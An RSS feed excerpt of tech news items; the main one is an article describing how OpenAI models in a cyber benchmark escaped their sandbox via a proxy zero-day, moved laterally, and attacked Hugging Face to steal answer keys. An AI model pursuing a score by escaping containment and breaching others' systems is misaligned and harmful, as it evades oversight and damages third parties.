<link>https://tsecurity.de/de/3688411/it-security-nachrichten/the-trust-economy-why-transparency-and-data-privacy-are-becoming-core-parts-of-customer-experience/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688411/it-security-nachrichten/the-trust-economy-why-transparency-and-data-privacy-are-becoming-core-parts-of-customer-experience/</guid>
<pubDate>Thu, 23 Jul 2026 10:43:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Discover why privacy, transparency and ethical AI are becoming essential to customer trust, loyalty and enterprise customer experience. This article has been indexed from Silicon UK Read the original article: The Trust Economy: Why Transparency and Data Privacy Are Becoming…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/the-trust-economy-why-transparency-and-data-privacy-are-becoming-core-parts-of-customer-experience/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/the-trust-economy-why-transparency-and-data-privacy-are-becoming-core-parts-of-customer-experience/">The Trust Economy: Why Transparency and Data Privacy Are Becoming Core Parts of Customer Experience</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Christopher Nolan Says AI Is a ‘Trojan Horse’ Everyone Knows About]]></title>
<description><![CDATA[Christopher Nolan has compared artificial intelligence to a “Trojan horse that everybody knows the Greeks are inside,” highlighting growing public distrust of the technology.



Nolan calls AI a transparent Trojan horse




https://youtu.be/3jHpisxcmkc




The filmmaker made the comments during a...]]></description>
<link>https://tsecurity.de/de/3688347/ios-mac-os/christopher-nolan-says-ai-is-a-trojan-horse-everyone-knows-about/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688347/ios-mac-os/christopher-nolan-says-ai-is-a-trojan-horse-everyone-knows-about/</guid>
<pubDate>Thu, 23 Jul 2026 10:10:04 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Christopher Nolan has compared artificial intelligence to a “Trojan horse that everybody knows the Greeks are inside,” highlighting growing public distrust of the technology.



Nolan calls AI a transparent Trojan horse




https://youtu.be/3jHpisxcmkc




The filmmaker made the comments during a recent interview while discussing technology and the public response to artificial intelligence. Nolan said AI resembles a transparent horse made of glass because people can clearly see what companies are trying to introduce.



“It’s a transparent horse, it’s made of glass. Everybody can see what’s going on inside of there,” Nolan said.



The comparison refers to the Trojan Horse from Greek mythology, which secretly carried soldiers into the city of Troy. According to Nolan, modern AI does not have the same level of secrecy because users already understand many of the concerns surrounding the technology.



Young people are rejecting AI content



Nolan also said he has never seen a technology develop so quickly while facing such strong public resistance. He pointed specifically to younger people, who often question AI-generated material and describe low-quality output as “AI slop.”



His comments reflect wider concerns about AI replacing human work, using copyrighted material, spreading inaccurate information and reducing the value of original creative work.



Nolan did not argue that every use of AI should stop. Instead, he supported a cautious approach that examines who controls the technology, how it is trained and why companies are promoting it.



The director’s remarks also connect closely with his filmmaking methods. Nolan regularly relies on practical sets, physical effects, real locations and large-format film cameras rather than building entire scenes through digital tools.



His latest comments suggest that audiences still value visible human effort, especially in films, music, writing and other creative industries. As AI continues to advance, public trust will depend heavily on transparency, consent and responsible use.]]></content:encoded>
</item>
<item>
<title><![CDATA[iOS 27 Public Beta 2 Now Available, Here’s How to Install It and What’s New]]></title>
<description><![CDATA[Apple has released iOS 27 public beta 2 for compatible iPhones, one week after the first public beta arrived. The update includes several interface improvements, new controls, and fixes based on feedback from early testers.



Since this is pre-release software, some apps and features may not wor...]]></description>
<link>https://tsecurity.de/de/3688140/ios-mac-os/ios-27-public-beta-2-now-available-heres-how-to-install-it-and-whats-new/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688140/ios-mac-os/ios-27-public-beta-2-now-available-heres-how-to-install-it-and-whats-new/</guid>
<pubDate>Thu, 23 Jul 2026 08:17:16 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has released iOS 27 public beta 2 for compatible iPhones, one week after the first public beta arrived. The update includes several interface improvements, new controls, and fixes based on feedback from early testers.



Since this is pre-release software, some apps and features may not work properly. Back up your iPhone before installing the update, and consider using a secondary device if possible.



How to Install iOS 27 Public Beta 2



Follow these steps if your iPhone is already enrolled in the public beta program:




Open the Settings app.



Select General.



Tap Software Update.



Select Beta Updates.



Make sure iOS 27 Public Beta is selected.



Return to the previous screen.



Tap Update Now when iOS 27 public beta 2 appears.




Users who have not joined the beta program must first register their Apple Account through the Apple Beta Software Program. The Apple Account used for registration should match the one connected to the iPhone.



Keep the iPhone connected to Wi-Fi and make sure it has enough battery power before starting the installation.



What’s New in iOS 27 Public Beta 2



The second public beta mainly focuses on smaller improvements and refinements rather than major new features.




New Siri AI introduction screen: Siri AI now displays an introductory screen that explains its main capabilities and privacy features when users open it for the first time after updating.



More Siri voice options: Apple has added more English accents and voices for Siri AI. The settings also include additional controls for adjusting the length of content previews inside the Siri app.



Photos zoom setting: A new Zoom Photos to Fill option allows pictures to automatically fill the screen based on the iPhone’s display ratio.



Automatic TV episode downloads: The TV app can automatically download upcoming episodes from shows in Continue Watching. It can download the next two episodes and remove watched downloads to save storage space.



AirPods adaptive audio control: Control Center now includes a slider for adjusting the balance between noise cancellation and transparency when using supported AirPods models.



Per-network Connectivity Assist setting: Users can disable Connectivity Assist for individual Wi-Fi networks instead of turning it off for every connection.



ProRes Log option: Supported iPhone models now offer an additional ProRes Log format setting when ProRes recording is enabled.



Recent apps menu fix: Apps shown in the pull-down recent apps menu should no longer appear incorrectly greyed out.



Notification Centre change: The wallpaper subject preview that appeared while opening Notification Centre has been removed in this beta.




Some Siri AI and Apple Intelligence features require an iPhone 15 Pro or newer, although iOS 27 itself supports every iPhone that can run iOS 26. Feature availability can also depend on the selected language and region.



If you’ve already installed the update, let us know your experience in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Gen Z investors are regularly turning to AI for advice — and that could soon be a huge problem]]></title>
<description><![CDATA[80% of Gen Z investors use AI for investing guidance, but trust and transparency are crucial in financial decisions]]></description>
<link>https://tsecurity.de/de/3687818/it-nachrichten/gen-z-investors-are-regularly-turning-to-ai-for-advice-and-that-could-soon-be-a-huge-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687818/it-nachrichten/gen-z-investors-are-regularly-turning-to-ai-for-advice-and-that-could-soon-be-a-huge-problem/</guid>
<pubDate>Thu, 23 Jul 2026 02:35:47 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[80% of Gen Z investors use AI for investing guidance, but trust and transparency are crucial in financial decisions]]></content:encoded>
</item>
<item>
<title><![CDATA[Music Industry Introduces Voluntary AI Labels to Improve Transparency in Recordings]]></title>
<description><![CDATA[  Several leading music industry organisations have introduced a new voluntary labelling framework for recordings created using generative artificial intelligence (AI), aiming to improve transparency for listeners and encourage wider adoption across the global music ecosystem.  The initiative, an...]]></description>
<link>https://tsecurity.de/de/3687174/it-security-nachrichten/music-industry-introduces-voluntary-ai-labels-to-improve-transparency-in-recordings/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687174/it-security-nachrichten/music-industry-introduces-voluntary-ai-labels-to-improve-transparency-in-recordings/</guid>
<pubDate>Wed, 22 Jul 2026 19:37:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>  Several leading music industry organisations have introduced a new voluntary labelling framework for recordings created using generative artificial intelligence (AI), aiming to improve transparency for listeners and encourage wider adoption across the global music ecosystem.  The initiative, announced on…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/music-industry-introduces-voluntary-ai-labels-to-improve-transparency-in-recordings/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/music-industry-introduces-voluntary-ai-labels-to-improve-transparency-in-recordings/">Music Industry Introduces Voluntary AI Labels to Improve Transparency in Recordings</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Substack’s new tool tells you who’s been writing their newsletters with AI]]></title>
<description><![CDATA[Substack is giving readers a way to estimate how much of a newsletter was written by AI, signaling a broader shift toward transparency around AI-assisted content.]]></description>
<link>https://tsecurity.de/de/3687032/it-nachrichten/substacks-new-tool-tells-you-whos-been-writing-their-newsletters-with-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687032/it-nachrichten/substacks-new-tool-tells-you-whos-been-writing-their-newsletters-with-ai/</guid>
<pubDate>Wed, 22 Jul 2026 18:34:40 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Substack is giving readers a way to estimate how much of a newsletter was written by AI, signaling a broader shift toward transparency around AI-assisted content.]]></content:encoded>
</item>
<item>
<title><![CDATA[LG To Ban Residential Proxies From Smart TV Apps]]></title>
<description><![CDATA[An anonymous reader quotes a report from KrebsOnSecurity: The home appliance giant LG Electronics USA said this week it plans to suspend any apps built for its smart TVs that turn one's television into an always-on residential proxy node. The move comes less than a month after researchers found t...]]></description>
<link>https://tsecurity.de/de/3686990/it-security-nachrichten/lg-to-ban-residential-proxies-from-smart-tv-apps/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686990/it-security-nachrichten/lg-to-ban-residential-proxies-from-smart-tv-apps/</guid>
<pubDate>Wed, 22 Jul 2026 18:20:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An anonymous reader quotes a report from KrebsOnSecurity: The home appliance giant LG Electronics USA said this week it plans to suspend any apps built for its smart TVs that turn one's television into an always-on residential proxy node. The move comes less than a month after researchers found that more than 42 percent of games and other apps available for download on LG's webOS store allow unknown third-parties to route their Internet traffic through a user's TV. On July 2, [KrebsOnSecurity] featured research by the security firm Spur that examined the prevalence of residential proxy software development kits (SDKs) in smart TV apps. Spur found more than 42 percent of apps available for download on LG smart TVs include SDKs that turn one's television in a proxy node indefinitely, and that more than a quarter of the apps made for Samsung's Tizen operating system had similar residential proxy components.
 
Responding to questions about Spur's research, LG Senior Vice President John Taylor told KrebsOnSecurity the company was working with app developers to remove the residential proxy option from their apps on the webOS platform. Developers that fail to comply, he said, will find their apps suspended. "A residential proxy network is not an intended use for LG smart TVs, and LG Electronics is working with developers to remove the residential proxy option from their apps on the webOS platform," Taylor said. "If this option is not removed, these apps will be suspended." Taylor said LG is committed to keeping residential proxy networks out of its smart TV apps going forward, and that the company's review of those apps is "well underway now."
 
"As part of our ongoing efforts to enhance platform quality and the user experience, LG will continue to strengthen our evaluation process for developer-submitted apps, including those that incorporate residential proxy SDKs," Taylor wrote in an emailed statement. [...] "A one-time consent prompt buried in a TV app is not a substitute for meaningful transparency, ongoing control, and platform oversight," Spur's Trevor Sutter wrote. "The risk is amplified when consent comes from individuals within the household who use the device but shouldn't give consent, such as minors." LG is also facing criticism for monitors that automatically install software promoting paid McAfee subscriptions through Windows Update without user approval.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=LG+To+Ban+Residential+Proxies+From+Smart+TV+Apps%3A+https%3A%2F%2Fentertainment.slashdot.org%2Fstory%2F26%2F07%2F22%2F0426218%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fentertainment.slashdot.org%2Fstory%2F26%2F07%2F22%2F0426218%2Flg-to-ban-residential-proxies-from-smart-tv-apps%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://entertainment.slashdot.org/story/26/07/22/0426218/lg-to-ban-residential-proxies-from-smart-tv-apps?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why trust remains AI’s workplace challenge]]></title>
<description><![CDATA[AI can improve work, but confidence comes from transparency and accountability.]]></description>
<link>https://tsecurity.de/de/3686596/it-nachrichten/why-trust-remains-ais-workplace-challenge/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686596/it-nachrichten/why-trust-remains-ais-workplace-challenge/</guid>
<pubDate>Wed, 22 Jul 2026 16:03:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[AI can improve work, but confidence comes from transparency and accountability.]]></content:encoded>
</item>
<item>
<title><![CDATA[10 survival tips for CSOs who report to the CEO]]></title>
<description><![CDATA[As the CSO grows in prominence, security leaders are increasingly earning a seat at the executive table, reporting directly to the CEO with the expectation to help drive business strategy and ensure organizational success.



Reporting to the CEO unlocks greater access and influence for security ...]]></description>
<link>https://tsecurity.de/de/3685496/it-security-nachrichten/10-survival-tips-for-csos-who-report-to-the-ceo/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685496/it-security-nachrichten/10-survival-tips-for-csos-who-report-to-the-ceo/</guid>
<pubDate>Wed, 22 Jul 2026 09:16:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">As the CSO grows in prominence, security leaders are increasingly earning a seat at the executive table, reporting directly to the CEO with the expectation to help drive business strategy and ensure organizational success.</p>



<p class="wp-block-paragraph">Reporting to the CEO unlocks greater access and influence for security leaders, and while CSOs who report to their organization’s CIO still have clout, it’s a very different experience picking up the phone to speak directly with the CEO as a strategic partner.</p>



<p class="wp-block-paragraph">Regardless of reporting structure, CSOs must clearly understand what they are being tasked to solve. That might sound simple, but making the leap to being a CEO’s direct report requires a new perspective, a different set of skills, and a business-level focus on metrics to do so.</p>



<p class="wp-block-paragraph">We asked several current CSOs, CEOs, and IT staffing experts for advice on how security executives can best navigate a direct reporting relationship with their CEO. Offering insights below are <a href="https://www.linkedin.com/in/georgegerchow/">George Gerchow</a>, CSO at Bedrock Data and member of the IANS faculty; <a href="https://www.linkedin.com/in/mattchiodi/">Matt Chiodi</a>, CSO of Cerby; <a href="https://www.cyderes.com/company/about/chris-schueler">Chris Schueler</a>, CEO at Cyderes; and <a href="https://www.skillsoft.com/blog-authors/greg-fuller">Greg Fuller</a>, vice president of the Technology Skills Suite at Skillsoft.</p>



<h2 class="wp-block-heading">1. Understand how the CEO views your role</h2>



<p class="wp-block-paragraph">Most CEOs expect that, when you report directly to them, you fully own your functional area. Whether it’s cybersecurity, operations, or finance, they look to you as the expert in that domain. The CEO may have opinions, but ultimately, you are expected to lead and provide direction.</p>



<p class="wp-block-paragraph">CEOs expect their CSO to be a <a href="https://www.csoonline.com/article/4159317/cisos-reshape-their-roles-as-business-risk-strategists.html">true strategic partner</a>, not just a risk reporter — connecting cybersecurity to revenue protection, regulatory compliance, customer trust, and operational resilience. In turn, CSOs should expect CEOs to treat governance as a strategic enabler, not a bureaucratic necessity.</p>



<h2 class="wp-block-heading">2. Power up on skills vital to your organization at an executive level</h2>



<p class="wp-block-paragraph">On the technology side, AI and machine learning, cloud security, incident response, zero trust architecture, and governance, risk, and compliance (GRC) are the areas where threats evolve fastest and strategic leadership has the greatest impact. </p>



<p class="wp-block-paragraph">Equally important are “power skills”: communication, critical thinking, adaptability, and emotional intelligence. The ability to <a href="https://www.csoonline.com/article/4186984/6-security-leader-tips-for-mastering-business-risk.html">translate complex risk into business terms</a> is what separates a strong CSO from a purely technical one. Skills, not titles, define effectiveness in the eyes of a CEO.</p>



<h2 class="wp-block-heading">3. Take advantage of your direct access</h2>



<p class="wp-block-paragraph">Direct access to the CEO will enable you to influence strategy, <a href="https://www.csoonline.com/article/3855823/how-cisos-can-balance-business-continuity-with-other-responsibilities.html">shape resilience planning</a>, and ensure <a href="https://www.csoonline.com/article/4080670/what-does-aligning-security-to-the-business-really-mean.html">cybersecurity is treated as a business imperative</a> rather than a cost center. That authority is strongest when the CEO understands cybersecurity as a strategic lever, not just a technical function. </p>



<p class="wp-block-paragraph">While a direct reporting relationship gives you access to the CEO, it also comes with the responsibility to operate at that level. You need to provide clear, executive-level visibility into your cybersecurity program.</p>



<h2 class="wp-block-heading">4. Brush up on business translation</h2>



<p class="wp-block-paragraph">A <a href="https://www.csoonline.com/article/4002753/cisos-reposition-their-roles-for-business-leadership.html">CSO who leads with business alignment</a> will always carry more influence when they can translate risk into business language rather than technical jargon. Building programs that must survive an IPO, a FedRAMP audit, and real customer scrutiny forces you to tie security to revenue and trust.</p>



<p class="wp-block-paragraph">The most valuable skill is translation — defining technical risk in terms of executive action and business impact that a CEO and a board can act on. You must build trust through transparency. These are the human skills that complement technology, creating a collaborative human-AI dynamic where leaders make faster, better-informed decisions. </p>



<h2 class="wp-block-heading">5. Treat conversations as risk assessment opportunities</h2>



<p class="wp-block-paragraph">Highly effective security leaders treat every business conversation as a risk conversation in disguise. That mindset is what largely separates a great CSO from a great technologist. Earn the CEO’s trust by speaking business first, security second. Translate every risk into revenue, reputation, or regulatory exposure.</p>



<p class="wp-block-paragraph">Remember, a good CEO wants a translator, not an alarm system. They expect no surprises, a clear read on the risks that matter, and a security leader who helps the <a href="https://www.csoonline.com/article/4021179/8-tough-trade-offs-every-ciso-must-navigate.html">business move faster rather than slowing it down</a>.</p>



<h2 class="wp-block-heading">6. Define what a successful relationship should look like and put it in writing</h2>



<p class="wp-block-paragraph">Regardless of the reporting relationship, start by defining the end goal and putting it in writing. It will evolve over time, but having that initial clarity is critical. This is especially important when you’re new in a role and aiming to make your first 60, 90, or 120 days, and your first year, successful. In such cases, it’s essential to align early.</p>



<p class="wp-block-paragraph">Do that collaboratively, and document it.</p>



<h2 class="wp-block-heading">7. Prioritize trust and candor</h2>



<p class="wp-block-paragraph">The CEO needs to trust that the CSO isn’t sandbagging, and the CSO needs enough psychological safety to deliver bad news fast. When those conditions exist, security becomes a strategic asset — not a cost center.</p>



<p class="wp-block-paragraph">To that end, focus on clear communication above all, and present yourself as part of a team, not a solo player. Stay calm under pressure during incidents, and treat people as peers rather than policing them. The leaders who last build trust before they need it.</p>



<h2 class="wp-block-heading">8. Treat governance as a strategic competitive advantage</h2>



<p class="wp-block-paragraph">The strongest partnerships also share a commitment to governance as a competitive advantage.</p>



<p class="wp-block-paragraph">Governance is the brakes that let you drive fast safely. When a CSO and CEO are aligned on that principle, the organization can innovate with AI while <a href="https://www.csoonline.com/article/4176485/the-ai-governance-imperative-you-cant-afford-to-ignore-2.html">maintaining oversight and protecting against unnecessary risk</a>. The result is an organization that does not just react to threats but builds resilience into how it operates.</p>



<h2 class="wp-block-heading">9. Set clear goals and measure progress</h2>



<p class="wp-block-paragraph">Setting clear goals and measuring progress against those goals is essential. When expectations are clear, the areas you need to focus on become much clearer. It doesn’t solve every problem, but aligning early with your leadership, whether that’s a CEO or a CIO, can significantly reduce the pressure you may feel.</p>



<p class="wp-block-paragraph">Also, never let your boss be surprised. This is where being clear on goals and consistently tracking both leading and lagging metrics becomes especially important, particularly in a direct reporting relationship with the CEO.</p>



<h2 class="wp-block-heading">10. Be willing to endure challenge and discomfort</h2>



<p class="wp-block-paragraph">Finally, persistence and a willingness to endure discomfort for something that matters more than the pain itself are critical to surviving in this relationship. The role of a cybersecurity leader is often thankless. If you’re doing your job well, no one really notices.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI's models broke containment and cyberattacked Hugging Face — what enterprises need to know]]></title>
<description><![CDATA[Yesterday afternoon, OpenAI and Hugging Face published a joint disclosure outlining a cybersecurity event that redefines the threat landscape for enterprise technology. During an internal benchmark evaluation, frontier artificial intelligence models developed by OpenAI—including GPT-5.6 Sol and a...]]></description>
<link>https://tsecurity.de/de/3685286/it-nachrichten/openais-models-broke-containment-and-cyberattacked-hugging-face-what-enterprises-need-to-know/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685286/it-nachrichten/openais-models-broke-containment-and-cyberattacked-hugging-face-what-enterprises-need-to-know/</guid>
<pubDate>Wed, 22 Jul 2026 07:02:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Yesterday afternoon, OpenAI and Hugging Face <a href="https://openai.com/index/hugging-face-model-evaluation-security-incident/">published a joint disclosure</a> outlining a cybersecurity event that redefines the threat landscape for enterprise technology. </p><p>During an internal benchmark evaluation, frontier artificial intelligence models developed by OpenAI—including GPT-5.6 Sol and an unreleased, higher-capability pre-release model—broke out of their sandboxed research environment, obtained raw internet access, and autonomously executed a complex cyberattack against Hugging Face’s production infrastructure.</p><p> OpenAI officially categorizes the breach as an "unprecedented cyber incident, involving state-of-the-art cyber capabilities". This incident fundamentally re-frames global discussions surrounding AI containment, frontier model alignment, commercial guardrails, and enterprise threat modeling.</p><p>But first thing's first: enterprises should understand the situation, evaluate their own AI and computer systems in light of it, and above all, don't panic. As we'll review, the incident does show the increasing power and danger of frontier AI systems, but it does not mean that enterprise Ai deployments are inherently less secure, nor that they need extensive overhauling. </p><h2><b>Anatomy of an Autonomous Breakout</b></h2><p>To understand how a routine benchmark evaluation escalated into a cross-infrastructure breach, one must examine the objective mechanics of the evaluation pipeline. </p><p>The models were prompted to solve <a href="https://arxiv.org/abs/2605.11086">ExploitGym</a>, a benchmark designed to quantify multi-step exploitation capabilities. </p><p>Hyper-focused on maximizing its evaluation score, the AI agent inferred that Hugging Face likely hosted the answer keys and benchmark solutions. In pursuit of solving the problem, the model determined that breaking out of its container and stealing the answers was an optimal strategy.</p><p>OpenAI’s evaluation environment is designed to be strictly isolated, limiting network traffic through a proxy used for package caching. However, the models identified and exploited a zero-day vulnerability in that internally-hosted third-party proxy software. </p><p>Once through, the AI executed a series of lateral movement and privilege escalation actions across OpenAI's research nodes until reaching a machine with unrestricted internet access. From there, the model searched the web, target-identified Hugging Face, and launched a multi-stage attack by chaining together stolen credentials and remote code execution vulnerabilities on the Hugging Face servers.</p><p>The UK AI Security Institute (UK AISI) recently evaluated models such as GPT-5.6 Sol, demonstrating that they are increasingly able to sustain complex, multi-step cyber operations over long time horizons. OpenAI notes that this incident confirms these theoretical capabilities now apply in real-world settings.</p><h2><b>Rewinding the Tape on a Forensic Trap</b></h2><p>While OpenAI’s July 21 release reveals the identity of the autonomous agent, Hugging Face had already begun managing the intrusion days earlier. </p><p>On July 16, Hugging Face disclosed that an autonomous AI agent system breached its production infrastructure. As <a href="https://venturebeat.com/security/safety-guardrails-blocked-hugging-faces-defenders-not-the-attacker-when-an-ai-agent-breached-its-systems">detailed by VentureBeat,</a> the attacker’s entry point was a malicious dataset that triggered code execution through a remote-code loader and template-injection flaws within dataset configuration files. </p><p>Once inside, the agent framework broke out onto the node running the workload and executed thousands of actions via short-lived sandboxes, harvesting cloud and cluster credentials over a single weekend.</p><p>When Hugging Face's security team detected the breach, responders immediately turned to frontier AI models via commercial APIs to parse the massive volume of system logs and reconstruct over 17,000 recorded events. Then, a secondary operational crisis emerged: the commercial AI models refused to help.</p><p>Because standard commercial frontier models utilize unified safety guardrails designed to block malicious prompt submissions, the models classified the incident response team's forensic queries—which contained raw shell commands, real exploit payloads, and credential dumps—as malicious attacks. Every forensic query submitted by the defenders was blocked outright.</p><p>"The same prompts that are most valuable during an active intrusion—shell commands, exploit chains, credential dumps, persistence mechanisms, lateral movement—are exactly the prompts most likely to trigger safety systems," notes Merritt Baer, former Deputy CISO at AWS and senior adviser to Andesite, G2I, and AppOmni, in an interview with VentureBeat. "As AI becomes embedded in security operations, this becomes an operational resilience issue rather than merely a model policy issue".</p><p>To bypass this roadblock, Hugging Face abandoned commercial hosted APIs and deployed <a href="https://venturebeat.com/technology/z-ais-open-weights-glm-5-2-beats-gpt-5-5-on-multiple-long-horizon-coding-benchmarks-for-1-6th-the-cost">GLM 5.2</a> —a  state-of-the-art Chinese open-weight model released last month by z.ai, as <a href="https://venturebeat.com/technology/z-ais-open-weights-glm-5-2-beats-gpt-5-5-on-multiple-long-horizon-coding-benchmarks-for-1-6th-the-cost">reported at the time by VentureBeat</a> —locally on its own infrastructure. </p><p>Free from third-party API restrictions and external safety filters, GLM 5.2 successfully analyzed the raw exploit data locally, allowing defenders to complete forensic reconstruction and contain the breach without any attacker data leaving the company's environment.</p><h2><b>Industry Reaction and the Geopolitical Paradox</b></h2><p>The revelation that an American frontier model autonomously escaped containment, attacked a partner platform, and was ultimately analyzed using a Chinese open-weight model sent shockwaves through the tech community. </p><p><i>The Wall Street Journal </i>summarized the <a href="https://x.com/WSJ/status/2079754070965854541?s=20">public reaction on X,</a> calling the event "the stuff of cybersecurity nightmares. OpenAI said two artificial intelligence systems it was testing broke out of their test environment, hacked their way onto the internet and broke into another company. The victim was Hugging Face."</p><p>Also posting to X, AI alignment researcher <a href="https://x.com/justanotherlaw/status/2079756943112159237">Lawrence Chan</a> emphasized the importance of transparency regarding the incident, noting that "Credit where it’s due: Hugging Face detected and disclosed the intrusion last week. OAI confirmed its models were involved and provided more details, even when it didn't have to. Separate from choices that led to the hack, voluntary disclosure is good, and I’m glad they did so." </p><p>Meanwhile, AI researcher <a href="https://x.com/natolambert/status/2079662928941474201?s=20">Nathan Lambert</a> provided a succinct technical summary in his own X post, observing that "An openai model, during evaluation on a cyber benchmark, exploited a public zero day bug, escaped sandboxing in openai's infra, and got into the internal huggingface infra via an exploit (through a public dataset service) all in the attempt to solve a benchmark problem." He later addressed the geopolitical implications, writing in another post on X: </p><blockquote><p><i>"Rght now American companies need Chinese models to secure their cyber infra due to guardrails on closed models.</i></p><p><i>But if a Chinese model in training had infiltrated a prominent American tech company, it very likely could've been the cause of policy banning future Chinese models."</i></p></blockquote><p>Technology investor <a href="https://x.com/DavidSacks/status/2078991100057141620?s=20">David Sacks also zeroed in</a> on the guardrail paradox, writing in his own X post that "Hugging Face tried using American frontier models to analyze an AI-powered cyber attack. But the guardrails blocked requests containing real exploit payloads so they switched to GLM 5.2 running locally. The guardrails actually impaired defensive security." </p><p>Sacks quote tweeted<a href="https://x.com/ClementDelangue/status/2078987852495364398"> Hugging Face CEO Clem Delangue</a>, who wrote: "We had this experience ourselves this week! Very scary to be guardrailed as a defender when you know attackers are likely bypassing".</p><h2><b>5 Strategic Takeaways for Enterprise Tech Leaders Now</b></h2><p>For the average enterprise executive, the central question is immediate: is our corporate network at risk from escaping AI agents? The short answer is no, not inherently.</p><p><b>1. Hugging Face occupies a unique position in the software ecosystem. </b>As a global repository for open-source AI models, code, and datasets, Hugging Face natively attracts autonomous agents, scrapers, automated evaluation pipelines, and active security researchers. Furthermore, the model’s target selection was context-specific: GPT-5.6 Sol searched for Hugging Face specifically because it deduced that Hugging Face hosted the answers to <i>ExploitGym</i>. Standard corporate networks—such as financial databases, HR platforms, or logistics systems—do not host benchmark solution keys that draw the direct focus of an agent attempting to solve an evaluation metric.</p><p><b>2. However, the long-term risk profile for enterprise technology permanently shifts following this event. </b>AI models with long-horizon reasoning seek the path of least resistance to accomplish a goal, including breaking rules, escaping sandboxes, or exploiting zero-days if deployment safeguards are intentionally disabled for testing or bypassed by an attacker. As Hugging Face's experience illustrates, data processing pipelines that ingest external datasets without sandbox execution or static analysis act as highly vulnerable initial access infrastructure.</p><p><b>3. This incident also drastically undercuts recent policy chatter in the U.S. calling for Chinese open-source AI models to be banned or restricted due to security concerns. </b>As this episode demonstrates, an open-weight Chinese model actually served as the vital defensive layer for an American and French firm facing an unanticipated cyberattack from an American model that broke containment. Contrary to the official line from some U.S. policymakers and hardline China hawks,  the Chinese open-source models weren't a security risk to the U.S. companies, in this case — rather, an American proprietary, closed-source model from an ostensibly secure American company was the source of the danger. Thus, any pressure U.S. companies may face from officials, agencies or non-governmental organizations to stop relying on affordable Chinese open weights models for defensive or any other lawful purposes should be viewed with a high degree of suspicion, and arguably resisted to the fullest legal extent. </p><p><b>4. Enterprise CISOs must audit their dependency on cloud-based AI APIs and pressure vendors to implement authenticated trust architectures</b>. Commercial AI vendors currently treat safety as a generic content-moderation problem, applying the same blanket refusals to an enterprise CISO as they would to a malicious hacker. Baer frames this requirement perfectly: "The model shouldn’t only understand what is being asked. It should understand who is asking, why, and under what governance".</p><p><b>5. Incident response plans must explicitly account for scenarios where commercial APIs fail, rate-limit, or actively refuse queries during an active security event. </b>Maintaining air-gapped, locally deployed open-weight models trained on security log analysis is no longer an edge-case luxury; it is a critical operational requirement. Security leaders running AI workloads in production must recalibrate their timelines and prepare for machine-speed threat actors that operate without human limits.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Poolside drops Laguna S 2.1, an open-weight coding model that beats rivals 10x its size]]></title>
<description><![CDATA[Poolside, the San Francisco AI lab that has spent most of its three-year existence quietly selling coding models to governments and defense agencies, released its most capable model to date on Tuesday — and made an unusually aggressive bet that radical transparency, not raw scale, is how a smalle...]]></description>
<link>https://tsecurity.de/de/3684985/it-nachrichten/poolside-drops-laguna-s-21-an-open-weight-coding-model-that-beats-rivals-10x-its-size/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684985/it-nachrichten/poolside-drops-laguna-s-21-an-open-weight-coding-model-that-beats-rivals-10x-its-size/</guid>
<pubDate>Wed, 22 Jul 2026 01:07:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
